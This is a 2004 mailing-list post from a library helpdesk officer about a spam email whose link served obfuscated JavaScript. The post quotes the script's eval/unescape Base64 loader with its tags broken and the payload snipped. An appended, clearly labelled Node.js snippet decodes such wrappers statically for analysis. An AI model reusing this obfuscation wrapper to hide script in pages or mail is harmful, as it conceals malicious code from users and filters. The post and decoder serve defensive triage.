[LINK] New spam trick
Daniel Rose
drose at nla.gov.au
Tue Jun 8 13:48:38 EST 2004
Hello,
I thought Linkers might be interested in a new email we've had at least two
of.
I've removed the rather offensive language.
The subject says "<user> f.. you a..h..", and inside it says "Is this your
mum ....... ?" and a link.
The knee-jerk response is outrage followed by investigation.
The link is to a jpg, but I assume it's set up specially (mime type?) as it
gives an HTML page which has a comments banner that the source is not
available.
I snipped the text in case it's a nasty thing and some fool grabs it from
the archive. Is this an overflow exploit? Where does one go to check stuff
like this?
Heavily indented is one line of code (I've "-broken-" the tags just in case
someone's email client goes berserk):
<s-broken-cript
language=JavaS-broken-cript>eval(unescape('var%20codelock_bas%3D%27ABCDEFGHI
JKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B%2F%27%3B%20function
%20codelock_dec%28str%29%20%7B%20str%3Dstr.split%28%27%40%27%29.join%28%27CA
g%27%29%3B%20str%3Dstr.split%28%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dst
r.split%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%20bt%2C%20dt%20%3D%20%2
7%27%3B%20for%28i%3D0%3B%20i%3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%
20%3D%20%28codelock_bas.indexOf%28str.charAt%28i%29%29%20%26%200xff%29%20%3C
%3C18%20%7C%20%28codelock_bas.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%20
0xff%29%20%3C%3C12%20%7C%20%28codelock_bas.indexOf%28str.charAt%28i%20%2B2%2
9%29%20%26%200xff%29%20%3C%3C%206%20%7C%20codelock_bas.indexOf%28str.charAt%
28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%20String.fromCharCode%28%28bt
%20%26%200xff0000%29%20%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2C%20
bt%20%26%200xff%29%3B%20%7D%20if%28str.charCodeAt%28i%20-2%29%20%3D%3D%2061%
29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-2%29%29%3B%20%7D%20el
se%20if%28str.charCodeAt%28i%20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.su
bstring%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D
%3B%20%7D')); document.write(codelock_dec('PHN
<SNIP>
Ww+')); </s-broken-cript>
Regards,
Daniel Rose
Helpdesk Officer
National Library of Australia
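
Added example, not part of the original post: a static decoder for the wrapper quoted above. The percent-encoded stub defines codelock_dec() as ordinary Base64 with three shorthand tokens ('@', '!', '*') expanded first, so the hidden markup can be read as inert text without running the script. The function names and the sample payload are constructed for illustration; the real payload was snipped by the poster.

```javascript
// Static decoder for the "codelock" wrapper quoted in the post.
// Nothing is eval()'d or written into a page; every result is plain text.

// Undo unescape('...') for %XX escapes. Literal whitespace is only mail
// line-wrapping (real spaces are %20), so it is removed first; this also
// rejoins escapes that the wrapping split in two ("%2" + newline + "7").
function unescapeWrapped(text) {
  return text.replace(/\s+/g, '').replace(/%([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Mirror of codelock_dec(): expand the three tokens, then Base64-decode.
// The stub's alphabet (codelock_bas) is the standard Base64 alphabet.
function codelockDecode(payload) {
  const b64 = payload.replace(/\s+/g, '')
    .split('@').join('CAg')
    .split('!').join('W5')
    .split('*').join('CAgI');
  // latin1 = one byte per character, matching String.fromCharCode in the stub
  return Buffer.from(b64, 'base64').toString('latin1');
}

// Triage helper (hypothetical): which opening tags does the decoded markup use?
function listTags(html) {
  const names = new Set();
  for (const m of html.matchAll(/<\s*([A-Za-z][A-Za-z0-9]*)/g)) {
    names.add(m[1].toLowerCase());
  }
  return [...names].sort();
}

// First statement of the stub exactly as quoted in the post, mail wrap included.
const STUB_FRAGMENT = 'var%20codelock_bas%3D%27ABCDEFGHI\n' +
  'JKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B%2F%27%3B';

// Constructed sample payload (NOT the snipped one): harmless markup with
// indentation, which is what the '@' and '*' tokens abbreviate.
const SAMPLE_PAYLOAD = 'PGI+I*@b!vPC9iPg==';

console.log(unescapeWrapped(STUB_FRAGMENT));
const decoded = codelockDecode(SAMPLE_PAYLOAD);
console.log(JSON.stringify(decoded), listTags(decoded));
```

Run it with Node.js against a saved copy of the page source rather than opening the link in a browser.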